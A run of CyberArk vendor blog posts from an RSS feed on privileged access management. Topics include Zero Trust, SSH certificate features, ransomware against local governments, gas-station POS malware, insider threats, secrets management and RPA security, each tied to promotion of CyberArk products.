What does Zero Trust have to do with privileged access? If we look back at some of the most successful government agency cyber attacks, a majority of them involved compromising privileged credentials. One of the most widely reported attacks impacted the U.S. Office of Personnel Management (OPM), where an estimated that 21.5 million records containing personal information were stolen by attackers who got into the network with malware and escalated privileges to infiltrate several OPM systems. It was the escalation of privileges that made this attack so impactful and a well-documented lack of “security basics” that jeopardized the OPM’s ability to contain damage. The Committee on Oversight and Government Reform reacted to the OPM breach by recommending that the “OMB [Office of Budget and Management] should provide guidance to agencies to promote a Zero Trust IT model.”

Zero Trust is centered on the belief that organizations should “never trust, always verify.” With Zero Trust, the way to limit the damage of a data breach is continuous validation of each request for access, monitoring the users’ activity, segmenting critical tasks across privileged users and enforcing session termination when a privileged user attempts uncommon and risky tasks.

If we think about the two access pathways into an organization, there’s standard users who generally have low-level access to the systems they need to do their jobs – usually limited to the application layer. Then there’s the privileged user who often has unfettered access to the application layer, sensitive data and the mission critical Tier 0 assets. And when you add modernized infrastructure into the picture, Zero Trust extends from requiring the trust and verification of human users to non-human users as well. This includes applications interacting with operating systems via service accounts and business (and robotic) automation processes where software bots are connecting, storing and accessing sensitive data and applications.

The OPM breach and the many others like it are strong indicators that security has to evolve beyond helping to ensure that only trusted users can access the network to, in the case of a data breach, making it so attackers can’t cause significant damage to the organization.

How to Align to Zero Trust

Across the workforce of the United States, each employee has multiple business accounts. When you multiply those accounts (which can up be upwards of 30 or more) by the number of employees in a federal agency, you can understand the scale makes the level of risk concerning. Then as you couple that with the Digital Transformation efforts occurring in the Federal sector and the increasing number of non-human users that require privileged access, the risk increases exponentially.

Privileged Access Management (PAM) solutions not only help mitigate credential theft by isolating and vaulting passwords from users and systems, but they also align with Zero Trust strategies by integrating with multi-factor authentication solutions for continuous validation. Effective PAM solutions should provide continuous session monitoring and recording and enable the detection of the risky behavior through the use of analytics and session termination when unauthorized tasks occur.

CyberArk is a certified NIAP vendor, and is regularly working with federal agencies to help them better secure their critical infrastructure, reduce risk and protect against attackers and malicious insiders. To align with Zero Trust frameworks, we recommend:

  • Implementing a risk-based approach to security
  • Implementing continuous multi-step authentication and security to Tier 0 assets
  • Securing core privileges on endpoints and endpoint devices
  • Securing and monitoring the privileged pathway
  • Implementing attribute-based granular access controls

Want to learn more? Take the self-guided Privileged Access Security: 101 tour or get a detailed privileged access risk assessment with the CyberArk Discovery & Audit assessment.

]]>
CyberArk Launches New Just-in-Time Capabilities and More in v11.2 https://www.cyberark.com/blog/cyberark-launches-new-just-in-time-capabilities-and-more-in-v11-2/ Thu, 16 Jan 2020 13:15:08 +0000 https://www.cyberark.com/?p=83794

Operational efficiency and strong security. Finding the balance between the two is something security teams wrestle with every day. This was our vision for version 11.2 of the CyberArk Privileged Access Security Solution – to provide new privileged access management (PAM) features that make it easier for organizations to manage risk while enabling the business as digital transformation continues to evolve. In this version, customers benefit from new ways to achieve least privilege to manage risk and improve productivity.

New Just-in-Time Access and SSH Certificate Authentication for SSH Session Management

Leading companies like Netflix, Facebook and Uber are using SSH certificate authentication for SSH session management, citing scalability, ease of use and strong security. This type of approach provides a centralized point of trust via a certification authority so that servers (hosts) only need to trust the clients (users) who have the appropriate certificates.

SSH certificates contain a few important elements, including unique identity information, operational restrictions and a public key. With SSH certificate authentication, instead of having to manage the authorized keys of a host or control access to private keys, the host just needs to be configured to trust the SSH certification authority.

Limited SSH key management can lead to a large volume of privileged accounts and standing access on the target, increasing the attack surface. SSH certificate authentication at scale helps align with the principle of least privilege and balances ease of use and security.

To help customers unlock these benefits, CyberArk now allows for SSH certificate-based authentication by providing secure privileged session isolation, which grants Linux and Unix admins instant, just-in-time access, without security teams needing to manage a private-public key pair for each account and remote machine.

End-users connect via SSH to a remote machine through CyberArk and, after authenticating, CyberArk signs and uses a short lived SSH certificate to authenticate to the remote machine with an isolated and controlled session.

Here’s how it works:

  1. A user opens a native SSH session (e.g. PuTTY) to the CyberArk Privileged Session Manager server.
  2. CyberArk then signs an SSH key with a certification authority key from the CyberArk Vault, producing an SSH certificate in the process.
  3. The SSH session to the target system or Linux VM, whether on-premises or in the cloud, is then brokered with the necessary privileged account.

SSH certificates never travel to the end user’s workstation and all contain a short, hard-coded Time to Life (TTL) of five minutes. Once certificates are used for connection, they are immediately deleted so that if they are somehow exposed to attackers, they won’t be usable after that short period of time.

This new capability expands CyberArk’s just-in-time offerings across cloud and hybrid environments and on the endpoint.

Create Native, Secure Access with Privilege Session Manager for Web

Along with Privileged Session Manager for SSH, we’ve also added a new tool to make native session management for web applications even easier. The Universal Connector Generator allows CyberArk customers to develop custom connectors that extend native, secure access capabilities to a wide range of SaaS or homegrown web applications.

In the era of digital transformation, web apps are ubiquitous for employees, but, whether they’re AWS Cloud Consoles, corporate social media accounts, or proprietary payroll portals, privileged access to apps that store sensitive data introduces new security risks.

With the Universal Connector Generator, CyberArk users can develop custom connectors that allow employees to launch fully isolated privileged sessions in web apps without credentials or session identifiers ever crossing their workstations – significantly reducing the risk of credential theft and session hijacking, two of the most common attack vectors in web and cloud app breaches.

The best part? Creating a plug-in is super easy and can be done in less than 15 minutes.

Here’s how.

The Universal Connector Generator automatically records the end user’s application login process, then creates a connector to isolate further sessions in this application. After testing confirms the connector provides native, isolated application access, the Universal Connector Generator automatically hardens the connector to ensure it meets security requirements. Teams can then export the connector for use by other Privileged Session Manager for Web users.

Custom Privileged Session Manager for Web connectors afford security teams the ability to provide secure, native access to their employees’ favorite applications.

This latest version of the CyberArk Privileged Access Security solution marks CyberArk’s ongoing commitment to helping our 5,000+ customers defend against targeted attacks with privileged access management while delivering a simple, efficient experience for their employees.

Expanded just-in-time capabilities and the addition of the Universal Connector are just two key features of v11.2. There are a host of PAM features with the CyberArk Privileged Access Security solution, including improved Kubernetes support for Application Access Manager, and new DevOps functionality in Privileged Session Manager for Web via out-of-the-box support for Jenkins and Ansible Tower.

Want to learn more? Contact us for a demo and join us on February 11th for a webinar and live demo showcasing native deployment options within CyberArk’s session management portfolio. Register here.

]]>
Busting Top Myths About Privileged Access Management https://www.cyberark.com/blog/busting-top-myths-about-privilege-access-management/ Tue, 14 Jan 2020 14:07:34 +0000 https://www.cyberark.com/?p=82944 Privileged Access Management

Today, businesses everywhere are investing in infrastructure to support growth – whether that’s moving to the cloud or automating tasks and processes.  However, the newly introduced devices, application stacks and accounts that come with this modernization all present additional opportunities for attacker exploitation. For any organization – big or small – identifying and addressing security risks across this expanding attack surface can be a formidable challenge.

Privileged access management (PAM) programs that secure pathways to critical business information are foundational to an effective corporate cybersecurity program. Why?  Attackers view privileged accounts as one of the best ways to gain a foothold within an organization’s infrastructure. In fact, the vast majority of cyber attacks involve compromised privileged credentials and PAM solutions provide a critical layer of defense.

But, while securing privileged access consistently tops the lists of projects that can reduce risk and improve operational efficiency, some misconceptions surrounding PAM persist. Today, we’re going to bust five of the most prevalent PAM myths.

Myth #1: Because privileged access exists everywhere, it is impossible to secure.

While the scope of privileged access can be intimidating based on the complexity of your environment, dedicated PAM solutions and related policies can actually shrink the attack surface by shutting down pathways to critical resources.

Leading PAM solutions can automatically map privileged credentials across cloud and hybrid environments, saving security teams significant time and effort. And for those unsure of where privileged accounts exists, there are free tools like CyberArk Discovery & Audit to help organizations gain visibility into their privileged account landscape.

Additionally, modern PAM tools also incorporate automatic rotation of SSH keys and other privileged credentials at regular intervals to eliminate the time-consuming and error-prone manual tasks required for regulatory compliance. Meanwhile, automatic session monitoring capabilities systematically record all privileged account sessions and identify which users are operating privileged accounts.

Finally, the best PAM tools also provide detailed session monitoring recordings that can be sorted into searchable metadata for compliance and incident response teams and leverage user behavior analytics to automatically detect and suspend risky privileged sessions.

The impossible just became achievable.  Between account mapping, automatic credential rotation and detailed session monitoring, privileged access can be uncovered, managed and secured.

Myth #2: Privileged access management tools are challenging for administrators to manage.

That may have been true in the past, but today’s PAM solutions greatly ease and simplify administrator workloads. Collecting all privileged accounts in a centralized vault eliminates the need to manually search for and manage privileged credentials. In increasingly dynamic network environments, centrally locating the necessary tools to appropriately manage users’ privileged access can improve the efficiency and efficacy of IT projects. Automation tools also enable administrators to eliminate time-intensive tasks in favor of more strategic initiatives.

Especially as organizations move to the cloud, PAM tools can be particularly useful to address emerging risks of cloud migration. When adopting a hybrid or public cloud infrastructure, even slight misconfigurations can create new vulnerabilities.  Having holistic tools in place to discover risks associated with privileged access can improve an organization’s security posture.

Myth #3: Identity and Access Management (IAM) solutions are sufficient to protect privileged access.

It’s true that IAM tools and Multi-Factor Authentication (MFA) methods are strategic investments – but they do not replace the value of a PAM solution.  PAM solutions can independently protect privileged accounts with human and non-human identities like application accounts used in robotic process automation (RPA) or DevOps – something IAM solutions simply aren’t designed to do.

Focused on risk reduction, PAM tools can also protect privileged business users from sophisticated social engineering attacks capable of bypassing MFA. Most importantly, IAM tools require direct connection to user databases like Active Directory (AD). These connections are often hosted on-premises. If any on-premises server is compromised, attackers can gain control over AD to implement Kerberos attacks, such as Golden Ticket, and exist undetected in a company’s network. PAM can provide a vital security layer for servers hosting IAM’s direct connection to user databases like AD.

To create a strong enterprise security fabric, IAM systems and PAM solutions should be deployed as collaborative tools.

Myth #4: Privileged Access Management solutions interfere with operational efficiency.

The truth is that the daily tasks of most workers don’t require elevated privileges – and therefore PAM solutions won’t impact them at all.  For those who do require elevated privileges, leading PAM tools offer a variety of user-friendly formats, including RDP, SSH and web-native access, to provide credential vaulting and session management in the background of their daily workflows. Native and transparent access provides organizations with comprehensive privileged session recordings while minimizing disruption for end users.

In fact, using PAM tools to automate time-consuming tasks for IT and security employees can improve productivity by freeing up time for higher-value projects. Audit teams can achieve the same benefits by automating compliance tasks — especially in highly regulated industries like healthcare and banking.  Manually sorting through all sessions that involve privileged credentials to find high-risk activity can be extremely time consuming. PAM solutions can automate these tasks and identify risky behavior for audit teams, freeing them up to spend their time on other critical tasks.

Modern PAM solutions can actually be a boon to operational efficiency – not an impairment.

Myth #5: It’s Difficult to Calculate ROI for Privileged Access Management solutions. 

The average cost of a data breach in 2019 came in at nearly $4 million dollars. Notably, this figure does not include the additional costs of lost business from reputation damage and theft of intellectual property. Privileged access is a focal point for organizations to demonstrate where security solutions can have a high impact.

In any security program, cost-efficiency is key. Organizations must take a risk-based approach, applying finite resources where they can achieve quick wins and long-lasting impact. And it’s in this area where PAM solutions can really shine. PAM is a high-leverage point where modest investments can achieve outsized ROI and risk reduction.

After deploying a PAM solution, organizations can scan their systems to see the decrease in the number of unsecured and unprotected systems. Since any unmanaged privileged account is a potential attack vector, each privileged account that has been discovered, secured and protected by a PAM solution is a direct reduction in the exposed attack surface and proof of ROI.

Effective security starts with protecting an organization’s most valuable information, and as a common target in most cyber attacks, unmanaged and unprotected privileged access represents a significant threat. By locking down privileged credentials, organizations deprive attackers of their preferred routes to critical data and assets. Simultaneously, session monitoring and threat detection capabilities can help teams detect and investigate misuse of privileged credentials — improving an organization’s response time to in-progress attacks.

Furthermore, many PAM solutions can PAM solutions can integrate with other enterprise software  solutions – from IoT device gateways  DevOps tools and network devices to vulnerability management systems – enhancing their value and streamlining security operations on the whole.

Want to learn more?  Check out CyberArk’s approach to Privileged Access Management or visit our resource center to find out more about the efficiency and security benefits of PAM.

]]>
Cyber Attacks Against State and Local Governments Surge https://www.cyberark.com/blog/cyber-attacks-against-state-and-local-governments-surge/ Thu, 09 Jan 2020 16:26:31 +0000 https://www.cyberark.com/?p=83232 Cyber attack on state and local government

Cyber attacks against state and local governments have been dramatically increasing. In 2019 alone, there were 140 ransomware attacks – an average of 3 per day – targeting public, state and local government and healthcare providers. This is up 65% from the previous year.

Just in the past month, four cities in the US were hit with ransomware infections. These cities, including New Orleans and Pensacola, Florida, all had essential government services sabotaged or halted. After the ransomware attack on New Orleans, the mayor was forced to declare a state of emergency. In Pensacola, the sanitation department lost email and telephone systems, internet servers and their online payment system.

Earlier in 2019, when an encrypting ransomware attack took Baltimore’s IT systems hostage, the attack froze thousands of government computers and disrupted everything from real estate sales to water bill payments. Even with the help of FBI, Secret Service and cybersecurity experts, the cost to the city will be astronomical at an estimated $18 million.

Cyber attacks against state and local governments show no sign of slowing in 2020. In fact, the Cybersecurity and Infrastructure Security Agency (CISA), a division of the Department of Homeland Security, recently released a statement urging vigilance against cyber attacks and encouraging the adoption of better cybersecurity practices.

That warning proved to be extremely timely. Over the past few days, the Texas Department of Information Resources has faced a spike in attempted cyber attacks, with 10,000 attempts to probe their systems occurring every minute.

What can state and local governments do to rise to meet this challenge? IT teams working for local agencies are often already making do with too few personnel and a stretched budget. So, while an improved cybersecurity posture is essential in the face of recent threats, it can be hard to figure out where to start.

So, start by protecting the most critical assets. Government entities frequently have access to a lot of personally identifiable information and other types of data that would be disastrous if an attacker got their hands on it. If privileged access to this data is kept safe, even in the case of a network breach, the most vital information would stay secure.

Privileged access is the gateway to these critical assets, and compromised privileged credentials have played a central role in almost every major targeted attack. That makes it a perfect starting place when it comes to securing state and local government systems against an ongoing tide of cyber attackers.  This is why the Center for Internet Security (CIS) has controlled use of administrative privileges as the fourth Basic CIS Control, only behind inventory and control of hardware and software assets and continuous vulnerability management.

Here is how a typical attack works: The cyber attacker starts by establishing a beachhead on the endpoint of the organization that they are aiming to breach. After gaining initial access and establishing persistence, the attacker escalates privileges to gain access to another system that brings them one step closer to their target. From there, the attacker can continue to move laterally until the target is reached, data is stolen, and operations are disrupted – or completely taken over.

By protecting the privileged credentials cyber attackers need, Privileged Access Management (PAM) provides security where it’s needed most. In the face of an onslaught of cyber attacks, state and local governments need more than ever to establish a proactive, sustainable cybersecurity program. Instead of getting overwhelmed, start with Privileged Access Management and keep the most vital assets protected.

It’s time to learn more about Privileged Access Management and staying safe from cyber attacks.

]]>
CISOs Weigh In On Managing Digital Transformation Risk https://www.cyberark.com/blog/cisos-weigh-in-on-managing-digital-transformation-risk/ Tue, 07 Jan 2020 14:00:52 +0000 https://www.cyberark.com/?p=82931 Digital Transformation

Around the world, companies in every industry are executing digital transformation initiatives to accelerate the pace of innovation, gain a leg up on the competition and improve business performance. As part of this push, they’re embracing DevOps methodologies, cloud platforms, and on-demand applications and services to increase business agility and improve economics. Meanwhile, advancements in artificial intelligence, the internet of things (IoT) and robotic process automation (RPA) are helping enterprises transform raw data into meaningful insights and improve productivity.

But, in an era of ubiquitous data, Chief Information Security Officers (CISOs) and security leaders face a host of new challenges their predecessors never encountered. In many ways, it’s like the Wild West as users access on-demand applications from any location using any device. In this new unchartered territory, the risk to confidential data is expanding along with the cyberattack surface.

Security leaders recognize the urgency of a fresh approach to cybersecurity and risk management yet are struggling to drive change within their companies. A PwC Digital Trust Insights survey1 reveals only 53 percent of companies take a proactive approach to cybersecurity by building risk management into digital transformation projects fully from the start.

Making decisions regarding risk management is a core function of the CISO, but they don’t always get the support they need to make those decisions stick. CISOs face a formidable challenge: they’re jockeying for executive mindshare and adequate funding for new programs, all while working to evolve long-standing corporate cultural practices and increase awareness.

Five Digital Transformation Secrets to Success from CISOs on the Front Lines

So how can security leaders overcome these issues and become accelerators for digital transformation? Together with PwC, we sat down with a number of CISOs who played an active role in transformation projects to understand their keys to success. Five common practices emerged from these conversations, which are outlined in a new whitepaper, Managing Risk in the Digital Era.

Among the revelations is the importance of assessing risk for each digital transformation project individually.

With threats coming from every angle, it’s difficult to prioritize cybersecurity projects and investments. Yet given ever-tightening budgets, CISOs are forced to make tradeoffs about which security projects and services they prioritize. The CISOs we spoke with stressed the need to assess risk on a project-by-project basis to effectively evaluate security and compliance concerns and make the best investment decisions.

According to one CISO of a major insurance provider, “There is no one-size-fits-all solution. We assess the risks of every project and every third-party provider individually, and make decisions accordingly.”

By taking a close look at each project, determining the type of data each application consumes, evaluating both internal and external threats and assessing all the systems and vendors involved across the entire application lifecycle, CISOs can reduce exposure and ensure security investments deliver the greatest return.

Other common practices successful CISOs employ to raise security awareness, tear down silos and improve digital transformation outcomes include:

  • Factor in security considerations from day one. By building strong relationships and working closely with technology leaders and line-of-business peers to ensure security is built into every project from the onset, CISOs can help the organization improve results.
  • Foster a security-first culture and mindset. CISOs who focus on improving communications and knowledge – from offering training courses to educating teams on the latest trends – are taking key steps to make security a core competency.
  • Weave security into DevOps systems and practices. CISOs should champion the integration of security into every phase of the DevOps process (i.e., automating security testing, integrating vulnerability analysis) to contain risk without slowing down the pace of development.
  • Improve communications with senior executives and the board. Learning how to communicate security risk in meaningful, relatable terms can help CISOs improve executive awareness and secure funding for critical cybersecurity initiatives.

By assessing each project individually, increasing cybersecurity awareness, building security into the corporate culture and improving executive-level communications, forward-looking CISOs are meeting digital transformation challenges head on. Download the whitepaper or tune in to our recent Data Breach Today podcast, “Digital Transformation: The Privileged Access Imperative” to learn more.

 

1© PwC. Not for further distribution without the prior written permission of PwC. PwC refers to the US member firm or one of its subsidiaries or affiliates, and may sometimes refer to the PwC network. Each member firm is a separate legal entity. Please see www.pwc.com/structure for further details.

 

]]>
POS Malware Exploits Weakness in Gas Station Networks https://www.cyberark.com/blog/pos-malware-exploits-weakness-in-gas-station-networks/ Fri, 20 Dec 2019 16:00:16 +0000 https://www.cyberark.com/?p=81642 Point-of-Sale Malware

Who would have thought that the riskiest part of your day would be gassing up your car?  Risky for your wallet, anyway. VISA recently reported that gas stations across North America are facing a spree of cyber attacks wherein attackers deploy point-of-sale (POS) malware on gas station networks with the goal of harvesting credit card information. Over the course of November and December, VISA investigated at least five such incidents.

So, why are gas stations in cyber attackers’ sights right now? It appears they have found a weak spot in pay-at-the-pump gas station transactions. The US is one of the last places in the world where magnetic strip credit cards are still accepted, which are much less secure than chip-and-PIN cards.

These cards use a PIN to link the card and the cardholder much like a debit card does. Without the PIN, even if cyber attackers can get their hands on a credit card number, they can’t use it. Furthermore, the chip-and-PIN card is much harder to copy than the magnetic strip card because it uses encryption to protect against malicious copying.

As of 2018, some 50% of general purpose credit card transactions in the US still used magnetic strip cards, leaving around 20 billion transactions annually in the US less secure. While many gas stations have installed chip-and-pin card readers inside the store, they haven’t updated the credit card readers on the pumps themselves – leaving them only able to utilize the insecure magnetic strip technology for each transaction – even if the customer is using a chip-and-pin card.

However, while the weaknesses exist at the pump, this goes beyond traditional skimming scams we’re familiar with.  The cyber attackers are actually deploying the malware onto a computer in the gas station back office to gather credit card information. Here is how it works.

The magnetic transaction starts at the pump when the card holder swipes the card. The information on the card is transferred from the pump to a back-office computer. This computer gathers transaction data from all the POS pump terminals in the gas station where that information is decoded or decrypted, stored in memory and, later, sent to the acquirer bank for authorization. If this computer has the malware in question, attackers are able to scan the computer and acquire any unencrypted transaction data – including credit card numbers.

It is true that transactions at the pump are regulated by the Payment Card Industry Data Security Standard (PCI DSS) which maintains that all magnetic credit card data must be encrypted on transfer and should not be stored and that credit card numbers must be encrypted if stored.

Unfortunately, this is not always the case, and data stored on the back office computer is frequently left unencrypted or only loosely encoded. If the credit card information on those computers comes from a magnetic strip card – which does not have its own encryption – than that information can be used by cyber attackers.

There are two ways to close this security loophole. Either install the more secure chip-and-pin credit card readers on the gas station pumps or implement better security on the back office computer. The first requires shutting down the pumps to overhaul the payment system. The second just requires installing software, so it’s the obvious choice – especially since starting in October 2020, responsibility for card draft fraud will move from the card issuer to the gas station.

It’s easy to overlook the security of a computer in a gas station, but since these computers contain sensitive information, it’s important that they have thorough security measures to protect them – even going beyond encryption.  Application control, for example, can prevent malware from running before it can do any damage and implementing the principle of least privilege would make it harder for an attacker who infiltrated a system to access critical information within that system.

CyberArk Endpoint Privilege Manager is currently capable of blocking part of the memory scan and will be able to secure against the entire memory scan in a future release.

In the end, whether the gas stations decide to install better cybersecurity or overhaul their pump payment system, it likely won’t happen immediately. In the meantime, it may be safer to pay for your gas inside the store.

]]>
Privilege Cloud & Alero Updates Bolster CyberArk SaaS https://www.cyberark.com/blog/privilege-cloud-alero-updates-bolster-cyberark-saas/ Thu, 19 Dec 2019 16:49:07 +0000 https://www.cyberark.com/?p=81618 Privilege Access Management SaaS

Despite hitting staggering highs this year, the market for Software as a Service (SaaS) is forecasted to skyrocket to $266.4B in 2020up from $227B in 2019. This isn’t a surprise, as SaaS provides scalability and flexibility while limiting maintenance requirements and the need for on-premises infrastructure. Security SaaS solutions have simultaneously emerged as a great way for organizations to improve their overall security posture without putting more burden on their administrators and end users.

As the global leader in privileged access management (PAM), we’re committed to innovation within our own market-leading portfolio of SaaS solutions, which also includes Endpoint Privilege Manager.  Today we are announcing some exciting updates coming to those last two – Privilege Cloud and Alero – all focused on making it easier than ever to reduce risk without introducing additional operational friction.

CyberArk Privilege Cloud

In case you are not familiar, CyberArk Privilege Cloud is our PAM as a Service offering designed to protect, control and monitor privileged access for hybrid and cloud environments. We’ve added a couple substantial new enhancements – one that helps to secure application credentials and the other that provides new support for native session management workflows. This enables organizations to:

Secure Credentials Used by Applications and Other Non-Human Identities
Privilege Cloud now provides comprehensive privileged credential management for many widely-used applications, including commercial off-the-shelf (COTS) applications; third-party vulnerability scanners and tools, IT Service management software, and Robotic Process Automation solutions, as well as internally developed non-containerized custom applications. This new support reduces the significant risk associated with storing hard-coded credentials within COTS and custom applications and instead allows these applications to securely pull credentials managed by CyberArk.

Cyberark Privilege Cloud now supports a broad range of application environments and platforms, including application servers, Java, .Net and scripts running on a variety of platforms and operating systems including Linux and Windows. Building on the already robust set of out-of-the-box plugins, customers can also now take advantage of pre-built integrations for application credential management available for Blue Prism, Forescout, Qualys, Rapid7, ServiceNow, Tenable, Automation Anywhere and UiPath on the CyberArk Marketplace.

Offer Native Access with New Session Management Capabilities

To help organization reduce friction, privileged users are now able to able to leverage their preferred user interface – like PuTTY, SecureCrt or MSTSC – for any SSH or RDP-based sessions managed by Privilege Cloud. This native access comes with the session management, isolation, recording and audit trail that our customers have come to expect.

CyberArk Alero

Launched earlier this year, CyberArk Alero is our newest SaaS offering, which provides secure remote vendor access for users who require privileged access to critical internal resources. Alero combines Zero Trust access, biometric authentication and just-in-time provisioning with CyberArk Core Privileged Access Security. The latest updates include:

REST API Support

CyberArk Alero now has comprehensive REST API support to automate common privileged tasks involved with securing third party vendor access. This includes automatically setting or removing access to CyberArk for third party users, inviting multiple vendors at once and accessing audit data. REST API support will also simplify integrations with IT Service Management as well as Identity Governance and Administration solutions. This added support delivers operational efficiencies by automating tasks from admins “to-do” lists that would otherwise have to be handled manually.

The world of SaaS moves quickly and we are continuing to create market leading solutions to help our customers scale, automate and simplify their PAM deployments. Want to learn more? Request a live demo here.

]]>
Privileged Access Abuse at Heart of Latest Insider Threats https://www.cyberark.com/blog/privileged-access-abuse-at-the-heart-of-latest-malicious-insider-incidents/ Wed, 18 Dec 2019 22:48:17 +0000 https://www.cyberark.com/?p=81309 Privilege Access Management PAM

While many companies spend a lot of energy protecting their business from external threats, security events initiated by insiders can be just as costly. Malicious insiders not only have intimate knowledge of corporate systems and infrastructure, but they also have something far more powerful: legitimate privileged access.

The challenge of insider threats is pervasive, and recent events indicate it shows no signs of slowing down. Whether watershed examples like Terry Childs, a former network administrator who essentially shut down the city of San Francisco, or cases involving IP theft or fraud, privileged access abuse can take form in a couple of ways. The first is when employees are granted more access than necessary to do their jobs. The second arises when someone with valid access uses privileged accounts to purposefully go against policy and abuses their power.

Regardless of the situation, the insider threat is ultimately a human challenge. Humans are unpredictable and it’s hard to foresee motivation. We want to trust the employees we hire – especially the ones who are given access to our most sensitive information. One key for companies is to understand who has privileged access, and consistently enforce the principle of least privilege – where employees are granted appropriate access to perform their jobs…no more, no less.

In addition, technology can help identify anomalous behavior and send an alert that systems or information were being accessed outside of policy. This adds yet another critical security layer that helps organizations better detect patterns and behaviors that may signal privileged access abuse.

While insider threat stories are certainly cautionary tales on unfettered privileged access for employees – the truth is that once an attacker is in a network it doesn’t matter if they are an attacker thousands of miles away or an employee three feet away – the risks are the same.

To be in the best position to mitigate these threats, organizations need to re-evaluate how they are securing and managing privileged access – not just to protect from the external attacker exploiting weaknesses, but also the malicious insider who might be working right under their noses.

]]>
How Security Keeps Up When Developers Drive Open Source https://www.cyberark.com/blog/how-security-keeps-up-when-developers-drive-open-source/ Thu, 12 Dec 2019 18:52:17 +0000 https://www.cyberark.com/?p=80964 Open Source Secrets Management

Open source is transforming software development. No longer do individual businesses need to purchase or build everything they need in-house. Instead, they can rely on a modern, interdependent ecosystem in which developers work together on mutually beneficial projects. This way, a single company doesn’t need to shoulder the entire development cost or have all the skills needed for the project.

But it hasn’t always been this way.

 The Enterprise Software Purchasing Shift: Proprietary to Freemium to Open Source

When it comes to software selection, purchasing and usage, a lot has changed over the past three decades.

In the 1980s, MS-DOS hit the market, quickly becoming the enterprise standard for computer technology. Soon after, Microsoft released Windows 1.0 and software companies like Oracle and SAP began making waves with their database products.

At that time, the CIO called the shots on what software the company would use, rarely consulting the technical users within the organization. Since each proprietary tool came with a hefty price tag, each purchasing decision was carefully considered, tools were tested and re-tested and it wasn’t uncommon for onboarding to take months – or even longer.

With the introduction of freemium models in the early 2000s, software became more open, accessible and easier to implement. While the CIO remained involved, decision making shifted to operations leads and organizations began adopting new applications that promised to streamline processes, boost productivity and enhance experiences.

Fast-forward 10 years, and the top-down decision making model was replaced by a bottom-up model. As organizations felt increasing pressure to build and deliver software and services better and faster, developers and other technical users began to take matters into their own hands. To meet ever-growing expectations, they required carte blanche access to tools that could help them automate the CI/CD pipeline, build and deploy apps at scale and solve new challenges – fast.

Free, open source software was the “perfect” solution. Since it didn’t require licensing, developers could deploy it quickly without involving senior IT leadership (and, often, completely without their knowledge). And given developers’ growing clout within organizations, open source usage increasingly became an accepted norm, empowering DevOps teams to push the boundaries of innovation and propel digital transformation initiatives. It’s estimated that 78 percent of all enterprises use open source software today.

The Open Source Security Challenge: Shortcuts for Handling Secrets Abound

Security teams recognize this shift in decision making, but are often left on the outside looking in. In the drive to produce code faster, DevOps teams often do not consult with security teams before adopting the latest, greatest open source tools. This can lead to insecure practices such as:

  • Embedding secrets – such as credentials for sensitive databases or cloud access keys – in applications and configuration files. Fueled by the growing sense of community around developers’ work, the risks associated with embedded secrets are heightened by the push to share code outside of the organization. While sharing code is well intended and brings important benefits, it may expose secrets and other confidential information embedded in the code, leaving the organization vulnerable to attack.
  • Re-using third-party code without sufficient scrutiny or attention to updates. In fact, 31 percent of organizations suspect or have verified a breach related to open source components in the last year.
  • Selecting and using an open source tool before evaluating it for potential security issues, particularly the tool’s ability to handle secrets securely.

Unfortunately, most conventional security management solutions and practices are designed to support traditional software applications and development methodologies and are far too slow and complex for the fast-paced world of open source software, microservices, containers, orchestrators and serverless technology.

Security leaders understand DevOps requires a fresh approach to security that mitigates risk and uncertainty without impairing velocity. Now, security leaders are looking for ways to empower developers to use open source tools more securely.

Four Ways to Empower Developers with Open Source Secrets Management

CyberArk Conjur is an open source security service for controlling privileged access to critical systems. It works to secure secrets (i.e., passwords, SSH keys, certificates and API keys) used by non-human identities and users in CI/CD environments and across open source tools, making it easy for DevOps teams to embed security into existing workflows.

Security teams are introducing open source secrets management to their development counterparts and are gaining traction with four key use cases:

  1. Secure CI/CD pipelines. Popular automation and configuration tools like Jenkins, Ansible, Puppet and Chef require secrets to access protected resources like databases, SSH servers and HTTPs services. Yet these secrets are often insecurely hard-coded or stored in configuration files or code. CyberArk Conjur removes these hard-coded secrets from open source DevOps tools across the CI/CD pipeline, while providing full audit trails, policy-based role-based access control (RBAC) and secrets rotation.
  2. Secure and authenticate containers. Containers have solved a lot of problems for DevOps and engineering teams by improving portability and speed. But their ephemeral nature makes it difficult to identify and determine access rights. CyberArk Conjur strongly authenticates container requests for secrets with native container attributes and manages secrets with RBAC policy. 
  3. Manage elastic and auto-scale environment secrets. Cloud providers offer auto-scaling capabilities to support elasticity and pay-as-you-grow economics. But, the dynamic nature of cloud auto-scaling creates security management challenges for organizations. When a new host comes online, the owner of the host can manually set permissions, but this human interaction doesn’t scale. CyberArk Conjur automates the identity enrollment of new hosts using strong authentication.
  4. Eliminate multi-cloud, multi-tool security islands. Secrets are typically maintained and administered separately, using different systems (or “security islands”), which makes it difficult to share secrets and institute uniform security policies. CyberArk Conjur centrally authenticates, controls and audits non-human access across leading tool stacks, container platforms and cloud environments with robust secrets management to help streamline operations and improve compliance.

With open source secrets management, developers can continue to do what they love – without worrying about security. And, for organizations with expanding enterprise requirements, CyberArk Application Access Manager provides a comprehensive solution for securing secrets and other credentials in DevOps environments.

Interested in Open Source, DevOps, or Labs research?  Join the Conversation on the CyberArk Commons!

If you’re interested in open source projects like Conjur, join the conversation on the CyberArk Commons Community.  The CyberArk Commons Community is an open source community dedicated to developers, engineers, cybersecurity researchers and other technically minded people. Visit the CyberArk Commons discussion forum and join in.

]]>
5 Best Practices for Robotic Process Automation Security https://www.cyberark.com/blog/5-best-practices-for-robotic-process-automation-security/ Tue, 10 Dec 2019 14:00:46 +0000 https://www.cyberark.com/?p=80676 RPA Security

Robotic process automation (RPA) is a powerful technology that streamlines and standardizes many process-oriented tasks. It is gaining traction around the globe and is now widely viewed as a core component of digital transformation initiatives. Applied to the right processes, RPA software robots can significantly improve productivity, quality and the accuracy of data and compliance, while empowering human workers to focus on more strategic and fulfilling work.

More than 78 percent of respondents to the CyberArk Global Advanced Threat Landscape 2019 Report say they are already investing in RPA technology or plan to invest or increase their investment over the coming year. A corroborating BluePrism study shows that 94 percent of business decision-makers understand the benefits RPA can bring to their business, with the vast majority (92 percent) planning to extend automation use cases.

According to the same BluePrism study, one-third of businesses around the world are currently automating between 20 and 29 tasks, and nearly a quarter are automating more than 40 tasks. These levels of adoption are not confined to single departments, RPA advocates are sharing their knowledge and building enthusiasm and support across the enterprise.

RPA Security and the Privileged Pathway in RPA

To perform automated functional tasks, this new digital workforce requires privileged access and credentials to connect to target systems and other applications, such as financial systems, ERP, CRM, supply chain and logistics systems – and even email. When these privileged credentials are left unsecured, they can become vulnerable to targeted, credential-based cyber attacks.

